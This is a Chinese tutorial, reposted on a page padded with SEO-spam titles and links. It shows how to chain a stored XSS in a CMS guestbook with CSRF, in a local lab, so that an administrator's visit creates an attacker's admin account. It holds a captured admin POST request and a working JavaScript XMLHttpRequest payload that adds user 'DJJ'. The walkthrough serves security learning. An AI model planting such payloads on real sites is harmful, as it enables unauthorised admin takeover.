当前位置: 首页 > news >正文

做移动网站优化首种子搜索神器在线引擎

做移动网站优化首,种子搜索神器在线引擎,黄页88网官网首页,哪些网站可以兼职做设计项目背景: 如下:我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。 源码地址下载链接:https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w 提取码:4444 考察内容: …

项目背景:

如下:我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。

源码地址下载链接:https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w 
提取码:4444

考察内容:

本次实验使用的存储型xss与csrf的联合使用。我们使用这两个漏洞可以使当管理员查看留言板后自动触发,使其自动创建一个管理员账号。本网站并没有使用token值来防止csrf,所以我们才能够利用。

前提:我们是在拥有管理员权限的情况下进行的。

大致流程:

1:分析,发现存储型xss漏洞

2:发现该网站并无token值,可以进行csrf

3:使用js伪造创建管理员的form表单

4:当管理员查看留言板后自动触发xss,创建一个攻击者自己定义的管理员账号。

开始实验:

1:发现存储xss

发现该网站存在一个留言板,其中的内容会存入数据库中,管理员会不定期去查看留言板中的内容。如下:经过测试我们发现当我们将恶意的js代码放到内容板块中存入数据库,当管理员去查看留言信息后就会自动触发js恶意代码:

管理员查看留言板:可以发现自动弹窗了,说明这里存在一个存储型xss。

2:该网站并没有使用token值来防止csrf,接下来我们使用抓包工具burp suite来抓创建管理员的包,需要打开代理设置,指向抓包工具burp suite(这个操作比较简单,不会的可以进行百度):

创建管理员页面:

抓包:

POST /admin/user.action.php HTTP/1.1
Host: cms:1234
Content-Length: 94
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cms:1234
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cms:1234/admin/user.add.php?act=add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: username=admin; userid=1; PHPSESSID=0m903rglk205acbq8ol191q271
Connection: closeact=add&username=2&password=2&password2=2&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0

通过对抓到的包分析:我们可以发现该包使用的是POST方式进行提交,将参数提交到/admin/user.action.php进行处理。所以我们就可以根据这个包中的内容进行伪造。

3:使用js伪造创建管理员账号的form表单:

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://cms:1234/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=DJJ&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

整个js的操作是创建管理员的操作,不过是由js自动触发。

xmlhttp.open:提交地址

xmlhttp.setRequestHeader:post的请求头

xmlhttp.send:post中的参数(创建的账号,密码等)

4:将伪造的恶意js代码上传留言板,当管理员查看留言信息后自动触发,创建一个新的管理员账号。

5:管理员查看留言板,触发存储xss,创建管理员账号。

如下:当我们查看留言板后,在去查看管理员账号信息发现已经自动创建了一个我们定义的管理员账号。

http://www.khdw.cn/news/47564.html

相关文章:

  • 建设银行潮州分行网站长沙做网络推广公司的
  • 帝国cms怎么做淘客网站怎样创建网站或者网址
  • 云南建设厅和网站短视频推广引流方案
  • 合肥高端网站建设百度问答一天能赚100块吗
  • 网站推广计划至少应包括游戏推广
  • 河北邯郸的最新通告重庆百度推广排名优化
  • 北京网站建设公司排名济南网络推广公司
  • 网站建设的内容管理成都网站关键词排名
  • 百度网站建设的十一个今日军事新闻头条最新
  • wordpress 主题 模板 区别seo工具包
  • 巴中住房建设部网站本地网络seo公司
  • 泗县建设银行网站西安区seo搜索排名优化
  • 做网站非法吗网站怎么推广
  • 零食网站的网站功能模块seo网站推广专员
  • 做慕墙上什么网站好找事做游戏代理0加盟费
  • 青海医院网站建设公司东莞网络推广排名
  • 公司网站建设代理怎么做运城seo
  • 网站排名工具怎么有自己的网站
  • 电商网站难做吗免费行情软件网站下载大全
  • bootstrap中文网站模板达州seo
  • 网站底部导航设置百度口碑
  • 做网站的一些好处seo规则
  • 二手房网站建设方案搜狗引擎搜索
  • 查看网站名称最佳bt磁力狗
  • 政府单位建设微网站的好处seo优化排名服务
  • 手机网站范例网站搭建需要什么技术
  • 奖励网站代码做网站的软件有哪些
  • 北京专业的做网站青青河边草直播免费观看
  • 中铁建设集团有限公司单位代码上海谷歌优化
  • 有FTP免费网站网店关键词怎么优化